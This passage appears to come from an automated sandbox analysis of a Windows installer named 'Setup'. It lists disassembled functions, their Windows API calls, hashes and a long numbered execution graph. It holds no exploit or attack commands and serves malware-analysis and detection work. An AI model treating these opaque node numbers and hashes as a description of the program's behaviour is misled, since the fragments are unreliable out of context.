                                                                                                                                                                        APIs
                                                                                                                                                                        • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                        • wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                          • Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CloseHandlelstrlenwvsprintf
                                                                                                                                                                        • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                        • API String ID: 3509786178-2769509956
                                                                                                                                                                        • Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                                                        • Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
                                                                                                                                                                        • Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                                                        • Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E
                                                                                                                                                                        Function 00405DE2 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                                        • lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
                                                                                                                                                                        • CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
                                                                                                                                                                        • lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 190613189-0
                                                                                                                                                                        • Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                                        • Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
                                                                                                                                                                        • Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                                        • Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4

                                                                                                                                                                        Execution Graph

                                                                                                                                                                        Execution Coverage:3.3%
                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                        Signature Coverage:3.3%
                                                                                                                                                                        Total number of Nodes:2000
                                                                                                                                                                        Total number of Limit Nodes:60
                                                                                                                                                                        execution_graph 96006 2b3c0a 96027 2cc819 96006->96027 96009 2b3c3f 96034 26b329 96009->96034 96010 2cc819 Sleep 96012 2b3c14 96010->96012 96012->96009 96012->96010 96016 26efdb 96012->96016 96033 27aa65 9 API calls 96012->96033 96015 2b3c8b 96057 2d446f 8 API calls 96015->96057 96020 26f450 96016->96020 96019 26f097 96021 26f483 96020->96021 96022 26f46f 96020->96022 96090 2d3fe1 81 API calls __wsopen_s 96021->96090 96058 26e960 96022->96058 96024 26f47a 96024->96019 96026 2b4584 96026->96026 96029 2cc83f 96027->96029 96030 2cc824 96027->96030 96028 2cc86d 96028->96012 96029->96028 96031 2cc851 Sleep 96029->96031 96030->96012 96031->96028 96033->96012 96035 26b338 _wcslen 96034->96035 96036 28017b 8 API calls 96035->96036 96037 26b360 __fread_nolock 96036->96037 96038 28014b 8 API calls 96037->96038 96039 26b376 96038->96039 96040 26bfa5 96039->96040 96217 26cf80 96040->96217 96042 26bfb5 96043 26bfc3 96042->96043 96044 2b0db6 96042->96044 96046 28014b 8 API calls 96043->96046 96226 26b4c8 96044->96226 96048 26bfd4 96046->96048 96047 2b0dc1 96049 26bf73 8 API calls 96048->96049 96050 26bfde 96049->96050 96051 26bfed 96050->96051 96052 26bed9 8 API calls 96050->96052 96053 28014b 8 API calls 96051->96053 96052->96051 96054 26bff7 96053->96054 96225 26be7b 39 API calls 96054->96225 96056 26c01b 96056->96015 96057->96019 96091 270340 96058->96091 96060 2b31d3 96145 2d3fe1 81 API calls __wsopen_s 96060->96145 96062 26ea0b messages 96062->96024 96063 26edd5 96063->96062 96074 28017b 8 API calls 96063->96074 96064 26eac3 96064->96063 96065 26eace 96064->96065 96122 28014b 96065->96122 96066 26ecff 96068 26ed14 96066->96068 96069 2b31c4 96066->96069 96071 28014b 8 API calls 96068->96071 96144 2e6162 8 API calls 96069->96144 96070 26ebb8 96131 28017b 96070->96131 96084 26eb6a 96071->96084 96073 28014b 8 API calls 96076 26e99d 96073->96076 96079 26ead5 __fread_nolock 96074->96079 96076->96060 96076->96062 96076->96063 96076->96064 96076->96070 96076->96073 96081 26eb29 __fread_nolock messages 96076->96081 96077 28014b 8 API calls 96078 26eaf6 96077->96078 96078->96081 96114 26d260 96078->96114 96079->96077 96079->96078 96081->96066 96082 2b31b3 96081->96082 96081->96084 96086 2b318e 96081->96086 96088 2b316c 96081->96088 96140 2644fe 207 API calls 96081->96140 96143 2d3fe1 81 API calls __wsopen_s 96082->96143 96084->96024 96142 2d3fe1 81 API calls __wsopen_s 96086->96142 96141 2d3fe1 81 API calls __wsopen_s 96088->96141 96090->96026 96110 270376 messages 96091->96110 96092 28014b 8 API calls 96092->96110 96093 280568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 96093->96110 96094 2b632b 96164 2d3fe1 81 API calls __wsopen_s 96094->96164 96096 271695 96102 26bed9 8 API calls 96096->96102 96108 27049d messages 96096->96108 96098 2b5cdb 96098->96108 96157 26bed9 96098->96157 96099 2b625a 96163 2d3fe1 81 API calls __wsopen_s 96099->96163 96100 270aae messages 96162 2d3fe1 81 API calls __wsopen_s 96100->96162 96101 26bed9 8 API calls 96101->96110 96102->96108 96107 2805b2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 96107->96110 96108->96076 96109 26bf73 8 API calls 96109->96110 96110->96092 96110->96093 96110->96094 96110->96096 96110->96098 96110->96099 96110->96100 96110->96101 96110->96107 96110->96108 96110->96109 96111 280413 29 API calls pre_c_initialization 96110->96111 96112 2b6115 96110->96112 96146 271e50 96110->96146 96156 271990 207 API calls 2 library calls 96110->96156 96111->96110 96161 2d3fe1 81 API calls __wsopen_s 96112->96161 96115 26d29a 96114->96115 96117 26d2c6 96114->96117 96169 26f6d0 96115->96169 96118 270340 207 API calls 96117->96118 96119 2b184b 96118->96119 96120 26d2a0 96119->96120 96192 2d3fe1 81 API calls __wsopen_s 96119->96192 96120->96081 96124 280150 ___std_exception_copy 96122->96124 96123 28016a 96123->96079 96124->96123 96127 28016c 96124->96127 96211 28521d 7 API calls 2 library calls 96124->96211 96126 2809dd 96213 283614 RaiseException 96126->96213 96127->96126 96212 283614 RaiseException 96127->96212 96130 2809fa 96130->96079 96132 28014b ___std_exception_copy 96131->96132 96133 28016a 96132->96133 96135 28016c 96132->96135 96214 28521d 7 API calls 2 library calls 96132->96214 96133->96081 96136 2809dd 96135->96136 96215 283614 RaiseException 96135->96215 96216 283614 RaiseException 96136->96216 96139 2809fa 96139->96081 96140->96081 96141->96084 96142->96084 96143->96084 96144->96060 96145->96062 96149 271e6d messages 96146->96149 96147 272512 96151 271ff7 messages 96147->96151 96168 27be08 39 API calls 96147->96168 96149->96147 96149->96151 96152 2b7837 96149->96152 96155 2b766b 96149->96155 96166 27e322 8 API calls messages 96149->96166 96151->96110 96152->96151 96167 28d2d5 39 API calls 96152->96167 96165 28d2d5 39 API calls 96155->96165 96156->96110 96158 26befc __fread_nolock 96157->96158 96159 26beed 96157->96159 96158->96108 96159->96158 96160 28017b 8 API calls 96159->96160 96160->96158 96161->96100 96162->96108 96163->96108 96164->96108 96165->96155 96166->96149 96167->96151 96168->96151 96170 26f710 96169->96170 96181 26f7dc messages 96170->96181 96198 2805b2 5 API calls __Init_thread_wait 96170->96198 96173 2b45d9 96173->96181 96199 26bf73 96173->96199 96174 26bf73 8 API calls 96174->96181 96175 2d3fe1 81 API calls 96175->96181 96181->96174 96181->96175 96185 270340 207 API calls 96181->96185 96187 26bed9 8 API calls 96181->96187 96188 271ca0 8 API calls 96181->96188 96189 26fae1 96181->96189 96193 26be2d 96181->96193 96197 27b35c 207 API calls 96181->96197 96206 2805b2 5 API calls __Init_thread_wait 96181->96206 96207 280413 29 API calls __onexit 96181->96207 96208 280568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96181->96208 96209 2e5231 101 API calls 96181->96209 96210 2e731e 207 API calls 96181->96210 96182 2b45fd 96205 280568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96182->96205 96185->96181 96187->96181 96188->96181 96189->96120 96192->96120 96194 26be38 96193->96194 96195 26be67 96194->96195 96196 26bfa5 39 API calls 96194->96196 96195->96181 96196->96195 96197->96181 96198->96173 96200 28017b 8 API calls 96199->96200 96201 26bf88 96200->96201 96202 28014b 8 API calls 96201->96202 96203 26bf96 96202->96203 96204 280413 29 API calls __onexit 96203->96204 96204->96182 96205->96181 96206->96181 96207->96181 96208->96181 96209->96181 96210->96181 96211->96124 96212->96126 96213->96130 96214->96132 96215->96136 96216->96139 96218 26d1c7 96217->96218 96223 26cf93 96217->96223 96218->96042 96220 26bf73 8 API calls 96220->96223 96221 26d03d 96221->96042 96223->96220 96223->96221 96230 2805b2 5 API calls __Init_thread_wait 96223->96230 96231 280413 29 API calls __onexit 96223->96231 96232 280568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96223->96232 96225->96056 96227 26b4dc 96226->96227 96228 26b4d6 96226->96228 96227->96047 96228->96227 96229 26bed9 8 API calls 96228->96229 96229->96227 96230->96223 96231->96223 96232->96223 96233 261044 96238 262793 96233->96238 96235 26104a 96274 280413 29 API calls __onexit 96235->96274 96237 261054 96275 262a38 96238->96275 96242 26280a 96243 26bf73 8 API calls 96242->96243 96244 262814 96243->96244 96245 26bf73 8 API calls 96244->96245 96246 26281e 96245->96246 96247 26bf73 8 API calls 96246->96247 96248 262828 96247->96248 96249 26bf73 8 API calls 96248->96249 96250 262866 96249->96250 96251 26bf73 8 API calls 96250->96251 96252 262932 96251->96252 96285 262dbc 96252->96285 96256 262964 96257 26bf73 8 API calls 96256->96257 96258 26296e 96257->96258 96312 273160 96258->96312 96260 262999 96322 263166 96260->96322 96262 2629b5 96263 2629c5 GetStdHandle 96262->96263 96264 262a1a 96263->96264 96265 2a39e7 96263->96265 96269 262a27 OleInitialize 96264->96269 96265->96264 96266 2a39f0 96265->96266 96267 28014b 8 API calls 96266->96267 96268 2a39f7 96267->96268 96329 2d0ac4 InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 96268->96329 96269->96235 96271 2a3a00 96330 2d12eb CreateThread 96271->96330 96273 2a3a0c CloseHandle 96273->96264 96274->96237 96331 262a91 96275->96331 96278 262a91 8 API calls 96279 262a70 96278->96279 96280 26bf73 8 API calls 96279->96280 96281 262a7c 96280->96281 96338 268577 96281->96338 96283 2627c9 96284 26327e 6 API calls 96283->96284 96284->96242 96286 26bf73 8 API calls 96285->96286 96287 262dcc 96286->96287 96288 26bf73 8 API calls 96287->96288 96289 262dd4 96288->96289 96361 2681d6 96289->96361 96292 2681d6 8 API calls 96293 262de4 96292->96293 96294 26bf73 8 API calls 96293->96294 96295 262def 96294->96295 96296 28014b 8 API calls 96295->96296 96297 26293c 96296->96297 96298 263205 96297->96298 96299 263213 96298->96299 96300 26bf73 8 API calls 96299->96300 96301 26321e 96300->96301 96302 26bf73 8 API calls 96301->96302 96303 263229 96302->96303 96304 26bf73 8 API calls 96303->96304 96305 263234 96304->96305 96306 26bf73 8 API calls 96305->96306 96307 26323f 96306->96307 96308 2681d6 8 API calls 96307->96308 96309 26324a 96308->96309 96310 28014b 8 API calls 96309->96310 96311 263251 RegisterWindowMessageW 96310->96311 96311->96256 96313 2731a1 96312->96313 96316 27317d 96312->96316 96364 2805b2 5 API calls __Init_thread_wait 96313->96364 96321 27318e 96316->96321 96366 2805b2 5 API calls __Init_thread_wait 96316->96366 96317 2731ab 96317->96316 96365 280568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96317->96365 96318 279f47 96318->96321 96367 280568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96318->96367 96321->96260 96323 263176 96322->96323 96324 2a3c8f 96322->96324 96325 28014b 8 API calls 96323->96325 96368 2d3c4e 8 API calls 96324->96368 96327 26317e 96325->96327 96327->96262 96328 2a3c9a 96329->96271 96330->96273 96369 2d12d1 14 API calls 96330->96369 96332 26bf73 8 API calls 96331->96332 96333 262a9c 96332->96333 96334 26bf73 8 API calls 96333->96334 96335 262aa4 96334->96335 96336 26bf73 8 API calls 96335->96336 96337 262a66 96336->96337 96337->96278 96339 2a6610 96338->96339 96340 268587 _wcslen 96338->96340 96351 26adf4 96339->96351 96343 2685c2 96340->96343 96344 26859d 96340->96344 96342 2a6619 96342->96342 96345 28014b 8 API calls 96343->96345 96350 2688e8 8 API calls 96344->96350 96347 2685ce 96345->96347 96349 28017b 8 API calls 96347->96349 96348 2685a5 __fread_nolock 96348->96283 96349->96348 96350->96348 96352 26ae02 96351->96352 96353 26ae0b __fread_nolock 96351->96353 96352->96353 96355 26c2c9 96352->96355 96353->96342 96353->96353 96356 26c2dc 96355->96356 96360 26c2d9 __fread_nolock 96355->96360 96357 28014b 8 API calls 96356->96357 96358 26c2e7 96357->96358 96359 28017b 8 API calls 96358->96359 96359->96360 96360->96353 96362 26bf73 8 API calls 96361->96362 96363 262ddc 96362->96363 96363->96292 96364->96317 96365->96316 96366->96318 96367->96321 96368->96328 96370 29316b GetLastError 96371 29318a 96370->96371 96372 293184 96370->96372 96376 2931e1 SetLastError 96371->96376 96389 294ff0 96371->96389 96396 293581 11 API calls 2 library calls 96372->96396 96378 2931ea 96376->96378 96377 2931a4 96397 292d38 96377->96397 96380 2931b9 96380->96377 96382 2931c0 96380->96382 96404 292f56 20 API calls BuildCatchObjectHelperInternal 96382->96404 96383 2931aa 96385 2931d8 SetLastError 96383->96385 96385->96378 96386 2931cb 96387 292d38 _free 17 API calls 96386->96387 96388 2931d1 96387->96388 96388->96376 96388->96385 96394 294ffd BuildCatchObjectHelperInternal 96389->96394 96390 29503d 96406 28f649 20 API calls _free 96390->96406 96391 295028 RtlAllocateHeap 96392 29319c 96391->96392 96391->96394 96392->96377 96403 2935d7 11 API calls 2 library calls 96392->96403 96394->96390 96394->96391 96405 28521d 7 API calls 2 library calls 96394->96405 96396->96371 96398 292d6c _free 96397->96398 96399 292d43 RtlFreeHeap 96397->96399 96398->96383 96399->96398 96400 292d58 96399->96400 96407 28f649 20 API calls _free 96400->96407 96402 292d5e GetLastError 96402->96398 96403->96380 96404->96386 96405->96394 96406->96392 96407->96402 96408 28076b 96409 280777 CallCatchBlock 96408->96409 96438 280221 96409->96438 96411 28077e 96412 2808d1 96411->96412 96415 2807a8 96411->96415 96476 280baf IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 96412->96476 96414 2808d8 96477 2851c2 28 API calls _abort 96414->96477 96427 2807e7 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 96415->96427 96449 2927ed 96415->96449 96417 2808de 96478 285174 28 API calls _abort 96417->96478 96421 2808e6 96422 2807c7 96424 280848 96457 280cc9 96424->96457 96426 28084e 96461 26331b 96426->96461 96427->96424 96472 28518a 38 API calls 3 library calls 96427->96472 96432 28086a 96432->96414 96433 28086e 96432->96433 96434 280877 96433->96434 96474 285165 28 API calls _abort 96433->96474 96475 2803b0 13 API calls 2 library calls 96434->96475 96437 28087f 96437->96422 96439 28022a 96438->96439 96479 280a08 IsProcessorFeaturePresent 96439->96479 96441 280236 96480 283004 10 API calls 3 library calls 96441->96480 96443 28023b 96448 28023f 96443->96448 96481 292687 96443->96481 96446 280256 96446->96411 96448->96411 96451 292804 96449->96451 96450 280dfc CatchGuardHandler 5 API calls 96452 2807c1 96450->96452 96451->96450 96452->96422 96453 292791 96452->96453 96456 2927c0 96453->96456 96454 280dfc CatchGuardHandler 5 API calls 96455 2927e9 96454->96455 96455->96427 96456->96454 96497 2826b0 96457->96497 96460 280cef 96460->96426 96462 263382 96461->96462 96463 263327 IsThemeActive 96461->96463 96473 280d02 GetModuleHandleW 96462->96473 96499 2852b3 96463->96499 96465 263352 96505 285319 96465->96505 96467 263359 96512 2632e6 SystemParametersInfoW SystemParametersInfoW 96467->96512 96469 263360 96513 26338b 96469->96513 96471 263368 SystemParametersInfoW 96471->96462 96472->96424 96473->96432 96474->96434 96475->96437 96476->96414 96477->96417 96478->96421 96479->96441 96480->96443 96485 29d576 96481->96485 96484 28302d 8 API calls 3 library calls 96484->96448 96486 29d58f 96485->96486 96489 280dfc 96486->96489 96488 280248 96488->96446 96488->96484 96490 280e05 96489->96490 96491 280e07 IsProcessorFeaturePresent 96489->96491 96490->96488 96493 280fce 96491->96493 96496 280f91 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 96493->96496 96495 2810b1 96495->96488 96496->96495 96498 280cdc GetStartupInfoW 96497->96498 96498->96460 96500 2852bf CallCatchBlock 96499->96500 96562 2932d1 EnterCriticalSection 96500->96562 96502 2852ca pre_c_initialization 96563 28530a 96502->96563 96504 2852ff __wsopen_s 96504->96465 96506 28533f 96505->96506 96507 285325 96505->96507 96506->96467 96507->96506 96567 28f649 20 API calls _free 96507->96567 96509 28532f 96568 292b5c 26 API calls _strftime 96509->96568 96511 28533a 96511->96467 96512->96469 96514 26339b __wsopen_s 96513->96514 96515 26bf73 8 API calls 96514->96515 96516 2633a7 GetCurrentDirectoryW 96515->96516 96569 264fd9 96516->96569 96518 2633ce IsDebuggerPresent 96519 2a3ca3 MessageBoxA 96518->96519 96520 2633dc 96518->96520 96521 2a3cbb 96519->96521 96520->96521 96522 2633f0 96520->96522 96687 264176 8 API calls 96521->96687 96637 263a95 96522->96637 96529 263462 96531 2a3cec SetCurrentDirectoryW 96529->96531 96532 26346a 96529->96532 96531->96532 96533 263475 96532->96533 96688 2c1fb0 AllocateAndInitializeSid CheckTokenMembership FreeSid 96532->96688 96669 2634d3 7 API calls 96533->96669 96536 2a3d07 96536->96533 96540 2a3d19 96536->96540 96539 26347f 96546 263494 96539->96546 96673 26396b 96539->96673 96689 265594 96540->96689 96542 2a3d22 96544 26b329 8 API calls 96542->96544 96545 2a3d30 96544->96545 96547 2a3d38 96545->96547 96548 2a3d5f 96545->96548 96550 2634af 96546->96550 96683 263907 96546->96683 96696 266b7c 96547->96696 96552 266b7c 8 API calls 96548->96552 96553 2634b6 SetCurrentDirectoryW 96550->96553 96555 2a3d5b GetForegroundWindow ShellExecuteW 96552->96555 96556 2634ca 96553->96556 96560 2a3d90 96555->96560 96556->96471 96560->96550 96561 266b7c 8 API calls 96561->96555 96562->96502 96566 293319 LeaveCriticalSection 96563->96566 96565 285311 96565->96504 96566->96565 96567->96509 96568->96511 96570 26bf73 8 API calls 96569->96570 96571 264fef 96570->96571 96714 2663d7 96571->96714 96573 26500d 96728 26bd57 96573->96728 96576 26bed9 8 API calls 96577 26502c 96576->96577 96734 26893c 96577->96734 96580 26b329 8 API calls 96581 265045 96580->96581 96582 26be2d 39 API calls 96581->96582 96583 265055 96582->96583 96584 26b329 8 API calls 96583->96584 96585 26507b 96584->96585 96586 26be2d 39 API calls 96585->96586 96587 26508a 96586->96587 96588 26bf73 8 API calls 96587->96588 96589 2650a8 96588->96589 96737 2651ca 96589->96737 96593 2650c2 96594 2a4b23 96593->96594 96595 2650cc 96593->96595 96597 2651ca 8 API calls 96594->96597 96596 284d98 _strftime 40 API calls 96595->96596 96599 2650d7 96596->96599 96598 2a4b37 96597->96598 96601 2651ca 8 API calls 96598->96601 96599->96598 96600 2650e1 96599->96600 96602 284d98 _strftime 40 API calls 96600->96602 96603 2a4b53 96601->96603 96604 2650ec 96602->96604 96606 265594 10 API calls 96603->96606 96604->96603 96605 2650f6 96604->96605 96607 284d98 _strftime 40 API calls 96605->96607 96608 2a4b76 96606->96608 96609 265101 96607->96609 96610 2651ca 8 API calls 96608->96610 96611 2a4b9f 96609->96611 96612 26510b 96609->96612 96615 2a4b82 96610->96615 96614 2651ca 8 API calls 96611->96614 96613 26512e 96612->96613 96616 26bed9 8 API calls 96612->96616 96618 2a4bda 96613->96618 96753 267e12 96613->96753 96617 2a4bbd 96614->96617 96619 26bed9 8 API calls 96615->96619 96620 265121 96616->96620 96621 26bed9 8 API calls 96617->96621 96623 2a4b90 96619->96623 96624 2651ca 8 API calls 96620->96624 96625 2a4bcb 96621->96625 96627 2651ca 8 API calls 96623->96627 96624->96613 96628 2651ca 8 API calls 96625->96628 96627->96611 96628->96618 96632 26893c 8 API calls 96634 265167 96632->96634 96633 268a60 8 API calls 96633->96634 96634->96632 96634->96633 96635 2651ab 96634->96635 96636 2651ca 8 API calls 96634->96636 96635->96518 96636->96634 96638 263aa2 __wsopen_s 96637->96638 96639 263abb 96638->96639 96640 2a40da ___scrt_fastfail 96638->96640 96800 265851 96639->96800 96642 2a40f6 GetOpenFileNameW 96640->96642 96645 2a4145 96642->96645 96647 268577 8 API calls 96645->96647 96649 2a415a 96647->96649 96649->96649 96650 263ad9 96828 2662d5 96650->96828 97514 263624 7 API calls 96669->97514 96671 26347a 96672 2635b3 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 96671->96672 96672->96539 96674 263996 ___scrt_fastfail 96673->96674 97515 265f32 96674->97515 96678 2a40cd Shell_NotifyIconW 96679 263a3a Shell_NotifyIconW 97519 2661a9 96679->97519 96680 263a1c 96680->96678 96680->96679 96682 263a50 96682->96546 96684 263969 96683->96684 96685 263919 ___scrt_fastfail 96683->96685 96684->96550 96686 263938 Shell_NotifyIconW 96685->96686 96686->96684 96687->96529 96688->96536 96690 2a22d0 __wsopen_s 96689->96690 96691 2655a1 GetModuleFileNameW 96690->96691 96692 26b329 8 API calls 96691->96692 96693 2655c7 96692->96693 96694 265851 9 API calls 96693->96694 96695 2655d1 96694->96695 96695->96542 96697 2a57fe 96696->96697 96698 266b93 96696->96698 96700 28014b 8 API calls 96697->96700 97557 266ba4 96698->97557 96702 2a5808 _wcslen 96700->96702 96701 266b9e 96705 267bb5 96701->96705 96703 28017b 8 API calls 96702->96703 96704 2a5841 __fread_nolock 96703->96704 96706 267bc7 96705->96706 96707 2a641d 96705->96707 97572 267bd8 96706->97572 97582 2c13c8 8 API calls __fread_nolock 96707->97582 96710 267bd3 96710->96561 96711 2a6427 96712 2a6433 96711->96712 96713 26bed9 8 API calls 96711->96713 96713->96712 96715 2663e4 __wsopen_s 96714->96715 96716 268577 8 API calls 96715->96716 96717 266416 96715->96717 96716->96717 96727 26644c 96717->96727 96775 26655e 96717->96775 96719 26b329 8 API calls 96720 266543 96719->96720 96723 266a7c 8 API calls 96720->96723 96721 26b329 8 API calls 96721->96727 96722 26655e 8 API calls 96722->96727 96725 26654f 96723->96725 96725->96573 96726 26651a 96726->96719 96726->96725 96727->96721 96727->96722 96727->96726 96778 266a7c 96727->96778 96729 265021 96728->96729 96730 26bd71 96728->96730 96729->96576 96731 28014b 8 API calls 96730->96731 96732 26bd7b 96731->96732 96733 28017b 8 API calls 96732->96733 96733->96729 96735 28014b 8 API calls 96734->96735 96736 265038 96735->96736 96736->96580 96738 2651d4 96737->96738 96739 2651f2 96737->96739 96740 2650b4 96738->96740 96742 26bed9 8 API calls 96738->96742 96741 268577 8 API calls 96739->96741 96743 284d98 96740->96743 96741->96740 96742->96740 96744 284e1b 96743->96744 96745 284da6 96743->96745 96786 284e2d 40 API calls 2 library calls 96744->96786 96752 284dcb 96745->96752 96784 28f649 20 API calls _free 96745->96784 96748 284e28 96748->96593 96749 284db2 96785 292b5c 26 API calls _strftime 96749->96785 96751 284dbd 96751->96593 96752->96593 96754 267e1a 96753->96754 96755 28014b 8 API calls 96754->96755 96756 267e28 96755->96756 96787 268445 96756->96787 96759 268470 96790 26c760 96759->96790 96761 28017b 8 API calls 96763 26514c 96761->96763 96762 268480 96762->96761 96762->96763 96764 268a60 96763->96764 96765 268a76 96764->96765 96766 2a6737 96765->96766 96772 268a80 96765->96772 96799 27b7a2 8 API calls 96766->96799 96767 2a6744 96769 26b4c8 8 API calls 96767->96769 96770 2a6762 96769->96770 96770->96770 96771 268b94 96773 28014b 8 API calls 96771->96773 96772->96767 96772->96771 96774 268b9b 96772->96774 96773->96774 96774->96634 96776 26c2c9 8 API calls 96775->96776 96777 266569 96776->96777 96777->96717 96779 266a8b 96778->96779 96783 266aac __fread_nolock 96778->96783 96781 28017b 8 API calls 96779->96781 96780 28014b 8 API calls 96782 266abf 96780->96782 96781->96783 96782->96727 96783->96780 96784->96749 96785->96751 96786->96748 96788 28014b 8 API calls 96787->96788 96789 26513e 96788->96789 96789->96759 96791 26c76b 96790->96791 96792 2b1285 96791->96792 96797 26c773 messages 96791->96797 96793 28014b 8 API calls 96792->96793 96795 2b1291 96793->96795 96794 26c77a 96794->96762 96797->96794 96798 26c7e0 8 API calls messages 96797->96798 96798->96797 96799->96767 96858 2a22d0 96800->96858 96803 26587d 96805 268577 8 API calls 96803->96805 96804 265898 96806 26bd57 8 API calls 96804->96806 96807 265889 96805->96807 96806->96807 96860 2655dc 96807->96860 96810 263a57 96811 2a22d0 __wsopen_s 96810->96811 96812 263a64 GetLongPathNameW 96811->96812 96813 268577 8 API calls 96812->96813 96814 263a8c 96813->96814 96815 2653f2 96814->96815 96816 26bf73 8 API calls 96815->96816 96817 265404 96816->96817 96818 265851 9 API calls 96817->96818 96819 26540f 96818->96819 96820 2a4d5b 96819->96820 96821 26541a 96819->96821 96826 2a4d7d 96820->96826 96870 27e36b 41 API calls 96820->96870 96823 266a7c 8 API calls 96821->96823 96824 265426 96823->96824 96864 261340 96824->96864 96827 265439 96827->96650 96871 266679 96828->96871 96831 2a5336 96996 2d36b8 96831->96996 96832 266679 93 API calls 96835 26630e 96832->96835 96834 2a5347 96836 2a534b 96834->96836 96837 2a5368 96834->96837 96835->96831 96838 266316 96835->96838 97041 2666e7 96836->97041 96840 28017b 8 API calls 96837->96840 96841 266322 96838->96841 96842 2a5353 96838->96842 96851 2a53ad 96840->96851 96893 263b39 96841->96893 97047 2ce30e 82 API calls 96842->97047 96845 2a5361 96845->96837 96847 2a555e 96849 2a5566 96847->96849 96848 2666e7 68 API calls 96848->96849 96849->96848 97049 2ca215 81 API calls __wsopen_s 96849->97049 96851->96847 96851->96849 96855 26b329 8 API calls 96851->96855 97018 2c9ff8 96851->97018 97021 2d1519 96851->97021 97027 26bba9 96851->97027 97035 265d21 96851->97035 97048 2c9f27 41 API calls _wcslen 96851->97048 96855->96851 96859 26585e GetFullPathNameW 